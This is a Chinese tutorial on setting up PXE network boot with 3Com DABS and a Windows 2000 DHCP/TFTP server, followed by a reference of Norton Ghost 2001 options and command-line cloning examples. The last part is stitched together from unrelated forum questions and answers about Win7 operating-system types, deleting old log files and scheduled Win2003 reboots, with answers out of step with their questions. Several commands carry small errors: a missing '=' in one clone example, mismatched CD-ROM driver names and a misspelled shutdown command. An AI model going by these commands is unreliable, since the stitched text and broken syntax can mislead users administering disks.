对于没有软驱、光驱的工作站，要实现PXE网络启动方式，需要完成三个步骤：

1、工作站的PXE启动设置

PXE网络启动一般要求在网卡上加装 PXE 启动芯片（PXE Boot ROM）；对于某些型号的网卡，也可以将 PXE 启动代码（Boot Code）写入主板的 Flash ROM；而一些主板上集成了网卡的品牌机（例如清华同方的商用机），可直接支持PXE启动。

常用的 RTL8139 芯片的网卡，其 PXE 启动设置方式是：机器启动时根据屏幕提示按下Shift+F10，在启动类型中选择PXE，开启网络启动选项即可。

2、制作 PXE 启动文件

制作 PXE 的启动文件，推荐使用 3Com 的 DABS（Dynamic Access Boot Services）。DABS 提供了功能强大的 PXE 启动服务、管理功能，但是，网上可供下载的是一个30天的试用版。所以，我们只用它的启动映像文件制作功能，而由 Windows 2000 Server 的 DHCP 服务器来提供 PXE 启动服务。

DABS 可以安装在任何一台运行 Windows 的机器上。安装后，运行 3Com Boot Image Editor，出现主界面图。选择“创建TCP/IP或PXE映像文件（Create a TCP/IP or PXE image file）”，出现对话窗口。为即将建立的映像文件命名，例如：pxeghost.img，其他用默认选项，将经测试正常的网络启动盘放入软驱，选择[OK]，创建PXE启动映像 Pxeghost.img文件。

在 3Com Boot Image Editor 的主菜单中，选择“创建PXE菜单启动文件（Creat a PXE menu boot file）”，在出现的窗口中选择[添加（Add）]，加入我们刚刚创建的启动映像文件Pxeghost.img，在“选项（Options）”标签中可以设置菜单标题和等待时间。

选择[保存（Se）]，给保存的PXE菜单启动文件命名为 Pxemenu.pxe。

3、服务器的PXE启动服务设置

Windows 2000 Server 的 DHCP 服务支持两种启动协议：DHCP 和 BOOTP。我们可以设定以下三种选择：仅 DHCP、仅 BOOTP、两者。如果我们的局域网中由其他的 DHCP 服务器提供动态 IP 地址分配，那么这里选“仅BOOTP”即可；如果需要这台服务器提供动态 IP 地址分配，则需要选“两者”。

接下来，设置启动文件名。在DHCP服务器的作用域选项中配置选项“067:启动文件名”，字串值为我们创建的 PXE 菜单启动文件名 Pxemenu.pxe。注意：文件名不包含路径。

DHCP 服务器只是将启动文件名通知给 BOOTP 客户机，客户机通过什么方式下载启动文件呢？答案是，需要 TFTP 服务。3Com 的 DABS 包含了一个 TFTP 服务组件，当然，也可以下载一个免费的 TFTP 服务器软件长期使用。

在 TFTP 服务器的设置中，规定一个服务目录。将制作的 PXE 启动文件 Pxeghost.img、Pxemenu.pxe 放到 TFTP 的服务目录中。TFTP 服务器设置为自动运行。

用 Ghost 多播克隆硬盘

现在运行 Ghost 多播服务器，任务名称为 Restore。设置完毕，按下[接受客户（Accept Clients）]按钮。启动要接受硬盘克隆的无软驱工作站，如果以上步骤操作无误，应该能够实现 PXE 启动，加入到多播克隆的任务当中。所有的目标工作站连接到本次任务之后，按下[发送（Send）]按钮，开始克隆任务。

五、参数设置

在 Options 中可以设置参数。下面简单介绍一下:

1．image write buffering：在建立备份文件时, 打开写缓冲；

2．sure：选择此项后, 不再会出现最终确认询问 (建议不要选择此项)；

3．no int 13：选择此项后, 不支持中断 13 (缺省时不选择)；

4．reboot：在对硬盘或者分区操作完成之后, 自动重启计算机；

5．spanning：通过多个卷架构备份文件 (选择此项时, 关闭 write buffering)；

6．autoname：自动为 spanning 文件命名；

7．allow 64k fat clusters：允许使用 64K FAT 簇 (仅在 Windows NT 中支持)；

8．ignore CRC errors：忽略 CRC 错误；

9．override size limit：如果出现分区大小不相配, 可忽略执行；

10．image read buffering：打开生成备份文件时的读缓存 (缺省时选中此项)。

六、软件特性

1.存贮介质

Ghost 支持的存储介质超出了我们的想象，它支持对等 LPT 接口、对等 USB 接口、对等 TCP/IP 接口、SCSI磁带机、便携式设备（JAZ、ZIP、MO等）、光盘刻录机（CDR、CDRW）等。而这些特性不需要任何外带的驱动程序和软件，只需一张软盘就可以做到！特别是对光盘刻录机的支持，如今的刻录机和空白光盘都十分便宜，非常适合作备份的用途。

2.兼容性

Ghost 对现有的操作系统都有良好的支持，包括 FAT16、FAT32、NTFS、HPFS、UNIX、NOVELL 等文件存储格式。同以前版本不同的是，Ghost 2001 加入了对 Linux EX2的支持（FIFO 文件存储格式），这也就意味着 Linux 的用户也可以用 Ghost 来备份系统了。

3.配套软件

A.Ghost 浏览器

在以前的 Ghost版本中，我们只能对整个系统进行简单的备份、复制、还原，要恢复单个的文件和文件夹还要使用外带的 GhostEXP 软件。现在，Symantec 公司已经将 Ghost 浏览器整合在软件中。Ghost 浏览器用类似于管理器的界面，通过它，我们可以方便迅速地在备份包中找出我们想要的文件和文件夹并还原。

使用Explorer可以备份整个硬盘或单个硬盘分区，点击工具栏上的圆柱形图标，弹出硬盘或分区选择对话窗口，然后再选择备份文件的储存目录并输入名称即可完成。要注意的是，非注册用户不能使用备份这项功能。

在 Ghost Explorer 中管理硬盘备份文件就非常方便了。首先选择打开一个备份文件(File/Open)，这时备份中的文件就像管理器一样在程序界面窗口中列出，可以在其中非常方便地查看、打开文件，也可以查找文件，或者将某个文件删除(但不能删除目录)。

在 Ghost Explorer 中提供了多种还原硬盘备份文件的方法，最方便的方法是使用鼠标右键点击某个文件，在弹出菜单中选择 Restore，然后输入要还原到的目录，这样，单个文件就从整个磁盘备份中还原出来了。当然，如果要还原整个磁盘备份，只需选择左面目录列表栏中最上面的带磁盘图标的目录项，然后点击工具栏中的还原图标 (第二个) 就可以了。

B.GDisk

GDisk 是一个新加入的实用工具，它彻底取代了 FDisk 和 Format，功能有：

* 快速格式化。

* 隐藏和显示分区。此功能允许一个以上的主 DOS分区，并且每个分区上的操作系统有不同的版本。隐藏分区的能力使计算机习惯于引导到选定的可引导分区，忽略其他隐藏分区中相同操作系统的安装。

* 全面的分区报告。

* 高度安全的磁盘擦除。提供符合美国国防部标准和更高安全标准的磁盘擦除选项。

与使用交互式菜单的 FDisk 不同，GDisk是由命令行驱动的。这提供了更快的配置磁盘分区和在批处理文件中定义 GDisk操作的能力。但与此同时，几十个参数会令普通用户头疼，因此笔者不推荐一般用户使用，Symantec 公司也应该推出相应的GUI（图形用户界面）控制台以方便用户使用。具体的参数说明可以用命令行 gdisk/? 了解。

C.Live Update

Live Update 是 Symantec公司软件的一个通用升级程序，它能够检查当前系统中已安装的 Symantec 软件，并且通过英特网对软件进行在线升级。

在安装 Ghost 2001 时，安装程序自动升级了 Live Update 程序的版本。

七、命令行参数：（Ghost 的无人 备份/恢复/复制 操作）

其实 Ghost 2001 的功能远远不止它主程序中显示的那些，Ghost 可以在其启动的命令行中添加众多参数以实现更多的功能。命令行参数在使用时颇为复杂，不过我们可以制作批处理文件，从而“一劳永逸”（类似于无人安装 Windows 98 和Windows 2000）。现在让我们来了解一些常用的参数（了解更加详细的参数介绍可查看 Ghost 的帮助文件）。

1.-rb

本次 Ghost 操作结束退出时自动重启。这样，在复制系统时就可以放心离开了。

2.-fx

本次 Ghost 操作结束退出时自动回到DOS提示符。

3.-sure

对所有要求确认的提示或警告一律回答“Yes”。此参数有一定危险性，只建议高级用户使用。

4.-fro

如果源分区发现坏簇，则略过提示而强制拷贝。此参数可用于试着挽救硬盘坏道中的数据。

5.@filename

在 filename 中指定 txt 文件。txt文件中为 Ghost 的附加参数，这样做可以不受DOS命令行 150 个字符的限制。

6.-f32

将源 FAT16 分区拷贝后转换成 FAT32（前提是目标分区不小于 2G）。WinNT 4 和Windows95、用户慎用。

7.-bootcd

当直接向光盘中备份文件时，此选项可以使光盘变成可引导。此过程需要放入启动盘。

8.-fatlimit

将 NT 的 FAT16 分区限制在 2G。此参数在复制 Windows NT 分区，且不想使用64k/簇的 FAT16 时非常有用。

9.-span

分卷参数。当空间不足时提示复制到另一个分区的另一个备份包。

10.-auto

分卷拷贝时不提示就自动赋予一个文件名继续执行。

11.-crcignore

忽略备份包中的 CRC ERROR。除非需要抢救备份包中的数据，否则不要使用此参数，以防数据错误。

12.-ia

全部映像。Ghost 会对硬盘上所有的分区逐个进行备份。

13.-ial

全部映像，类似于 -ia 参数，对 Linux 分区逐个进行备份。

14.-id

全部映像。类似于 -ia 参数，但包含分区的引导信息。

15.-quiet

操作过程中禁止状态更新和用户干预。

16.-script

可以执行多个 Ghost 命令行。命令行存放在指定的文件中。

17.-split=x

将备份包划分成多个分卷，每个分卷的大小为 x兆。这个功能非常实用，用于大型备份包复制到移动式存储设备上，例如将一个 1.9G 的备份包复制到 3 张刻录盘上。

18.-z

将磁盘或分区上的内容保存到映像文件时进行压缩。-z 或 -z1 为低压缩率（快速）；-z2 为高压缩率（中速）；-z3 至 -z9 压缩率依次增大（速度依次减慢）。

19.-clone

这是实现 Ghost 无人备份/恢复的核心参数。使用语法为：

-clone,MODE=(operation),SRC=(source),DST=(destination),[SZE(size),SZE(size)...]

此参数行较为复杂，且各参数之间不能含有空格。其中 operation意为操作类型，值可取：copy：磁盘到磁盘；load：文件到磁盘；dump：磁盘到文件；pcopy：分区到分区；pload：文件到分区；pdump：分区到文件。

Source 意为操作源，值可取：驱动器号，从1开始；或者为文件名，需要写绝对路径。

Destination 意为目标位置，值可取：驱动器号，从 1开始；或者为文件名，需要写绝对路径；@CDx，刻录机，x 表示刻录机的驱动器号，从1开始。

下面举例说明：

1.命令行参数：ghostpe.exe -clone,mode=copy,src=1,dst=2

完成操作：将本地磁盘1复制到本地磁盘2。

2.命令行参数：ghostpe.exe -clone,mode=pcopy,src=1:2,dst=2:1

完成操作：将本地磁盘1上的第二分区复制到本地磁盘2的第一分区。

3.命令行参数：ghostpe.exe-clone,mode=load,src=g:\3prtdisk.gho,dst=1,sze1=450M,sze2=1599M,sze3=2047M

完成操作：从映像文件装载磁盘1，并将第一个分区的大小调整为450MB，第二个调整为1599MB，第三个调整为2047MB。

4.命令行参数：ghostpe.exe -clone,mode=pdump,src2:1:4:6,dst=d:\prt246.gho

完成操作：创建仅含有选定分区的映像文件。从磁盘2上选择分区1、4、6。

八、一些示例

ghost.exe -clone,mode=copy,src=1,dst=2 -sure

硬盘对拷

ghost.exe -clone,mode=pcopy,src=1:2,dst=2:1 -sure

将一号硬盘的第二个分区复制到二号硬盘的第一个分区

ghost.exe -clone,mode=pdump,src=1:2,dst=g:\bac.gho

将一号硬盘的第二个分区做成映像文件放到 g 分区中

ghost.exe -clone,mode=pload,src=g:\bac.gho:2,dst=1:2

从内部存有两个分区的映像文件中，把第二个分区还原到硬盘的第二个分区

ghost.exe -clone,mode=pload,src=g:\bac.gho,dst=1:1 -fx -sure -rb

用 g 盘的 bac.gho 文件还原 c 盘。完成后不显示任何信息，直接启动

ghost.exe -clone,mode=load,src=g:\bac.gho,dst=2,SZE1=60P,SZE2=40P

将映像文件还原到第二个硬盘，并将分区大小比例修改成 60:40

自动还原磁盘：

首先做一个启动盘，包含 Config.sys, Autoexec.bat, Command, Io.sys, Ghost.exe 文件(可以用 windows 做启动盘的程序完成)。Autoexec.bat 包含以下命令：

Ghost.exe -clone,mode=pload,src=d:\bac.gho,dst=1:1 -fx -sure -rb

利用在 D 盘的文件自动还原，结束以后自动退出 ghost 并且重新启动。

自动备份磁盘：

ghost.exe -clone,mode=pdump,src=1:1,dst=d:\bac.gho -fx -sure -rb

自动还原光盘：

包含文件：Config.sys, Autoexec.bat, Mscdex.exe (CDROM 执行程序), Oakcdrom.sys (ATAPI CDROM 兼容驱动程序), Ghost.exe。

Config.sys 内容为：

DEVICE=OAKCDROM.SYS /D:IDECD001

Autoexec.bat 内容为：

MSCDEX.EXE /D:IDECE001 /L:Z

Ghost -clone,mode=load,src=z:\bac.gho,dst=1:1 -sure -rb

可以根据下面的具体说明修改示例：

1.-clone

-clone 在使用时必须加入参数，它同时也是所有的 switch{batch switch} 里最实用的。下面是 clone 所定义的参数：

mode={copy|load|dump|pcopy|pload|pdump},

src={drive|file|driveartition},

dst={drive|file|driveartition}

mode 指定要使用哪种 clone 所提供的命令

copy 硬盘到硬盘的复制 (disk to disk copy)

load 文件还原到硬盘 (file to disk load)

dump 将硬盘做成映像文件 (disk to file dump)

pcopy 分区到分区的复制 (partition to partition copy)

pload 文件还原到分区 (file to partition load)

pdump 分区备份成映像文件（partition to file dump)

win7里面如何体现出批处理操作系统、分时操作系统以及实时系统的特点

forfiles /p C:\WINDOWS\system32\LogFiles /s /M *.log /D -30 /c "cmd /c del @file"

自动删除30天前的，根据你自己需要更改，然后做个任务定期执行就可以了

如何实现win2003服务器定时自动重启？

还真不知怎么样回答你的问题。

批处理系统，一般来说就是按作业的先后顺序来执行作业任务，每个任务都独占处理机和存储，比如Win7里的批处理文件或许可以体现这一点。

分时操作系统，一般是指同时为多个用户服务的一种系统，系统将处理机和存储按一定的时间间隔分配给每个用户，的利用率相当高，每个用户都感觉自己在独占一样，如果真要体这一样，我想就像用win7远程桌面到win2003上吧，或许win2003就算一个分时系统。

实时系统要求就很严格了，有时间约束，实时原语、调度函数等运行开销应应该是早就预见了的还是就是可靠性要求比较高，比如单片机之类的，还有嵌入式系统之类的都属于实时系统。

唉，<<操作系统原理>>这门课程我是十几年前学的了，都丢回去给老师了，凭记忆随便打，希望能给你一点提示。

会用任务吗？

用它来执行bat批处理

在批处理里写这么一行shutdonw -r,就OK了

但是如果你的服务器还有其它程序或服务要按顺序关闭的话，就要注意一下了，可以把这个批处理扩展一下